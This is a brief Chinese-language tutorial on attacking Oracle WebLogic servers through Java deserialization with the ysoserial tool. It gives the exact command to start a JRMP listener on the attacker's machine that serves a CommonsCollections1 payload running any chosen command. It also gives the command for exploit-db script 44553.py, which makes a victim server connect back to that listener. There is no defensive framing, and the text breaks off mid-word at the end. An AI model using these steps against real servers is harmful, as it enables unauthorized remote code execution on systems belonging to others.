Ysoserial
介绍
Ysoserial是国外一款安全工具,集合了各种java反序列化payload,下载地址:
https://github.com/frohoff/ysoserial/
使用方法
1、首先使用ysoserial在攻击机上启动一个 JRMP server,输入以下命令
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
[listen port]:攻击机要监听的端口
[command]:想要执行的命令
2、开始使用44553.py脚本来向目标发送数据包(基于python2.x)
下载地址: https://www.exploit-db.com/download/44553
python 44553.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
[victim ip]:目标weblogic的IP
[victim port]:目标weblogic的端口
[path to ysoserial] :ysoserial的路径
[JRMPListener ip] :第一步中启动JRMP Server的IP地址
[JRMPListener port] :第一步中启动JRMP Server的I端口地址
[JRMPClient]:执行JRMPClien